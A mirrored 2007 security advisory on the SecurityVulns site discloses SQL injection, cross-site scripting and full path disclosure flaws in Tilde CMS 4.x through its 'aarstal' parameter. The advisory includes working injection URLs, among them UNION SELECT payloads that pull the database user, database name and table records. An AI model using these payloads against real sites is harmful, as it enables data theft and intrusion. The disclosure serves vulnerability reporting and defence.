Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  FIGIS (FILogin.do) Bypass SQL Injection Vulnerability

  JLMForo System (modificarPerfil.
php) Cross-Site Scripting Vulnerability

  Re: PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source / DB Credentials Disclosure

  PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source / DB Credentials Disclosure

From:kingoftheworld92_(at)_fastwebnet.it <kingoftheworld92_(at)_fastwebnet.it>
Date:27 ноября 2007 г.
Subject:Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection

---------------------------------------------------------------
____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
|   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
|   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
|___|___|  /\__|  /______  /\___  >__|            |___||__|  
         \/\______|      \/     \/                         
---------------------------------------------------------------

Http://www.inj3ct-it.org             Staff[at]inj3ct-it[dot]org

---------------------------------------------------------------

Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection

---------------------------------------------------------------

#By KiNgOfThEwOrLd                              

---------------------------------------------------------------
PoC

D'u need an explanation?!? i don't think so :P
---------------------------------------------------------------
SQL Injection

http://[target]/[tilde_path]/index.
php?id=[yeardetail_id]&mode=yeardetail&aarstal=%27

Little examples

Using user() and database() functions u can get some informations about the database...as:

http://[target]/[tilde_path]/index.
php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/
1,2,user(),database(),5/*

Or u can get some recordes by the database like:

http://[target]/[tilde_path]/index.
php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/
1,2,[row_name],4,[row_name]/**/from/**/[table_name]/*

D'u want the tables n' the rows? Find it yourself ;P
---------------------------------------------------------------
something else..

Xss Vulnerability

http://[target]/[tilde_path]/index.
php?id=[yeardetail_id]&mode=yeardetail&aarstal=[XSS]
---------------------------------------------------------------
Full Path Disclosure

http://[target]/[tilde_path]/index.
php?search=%3C&mode=search&sider=on&tss=on&linier=on
---------------------------------------------------------------

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород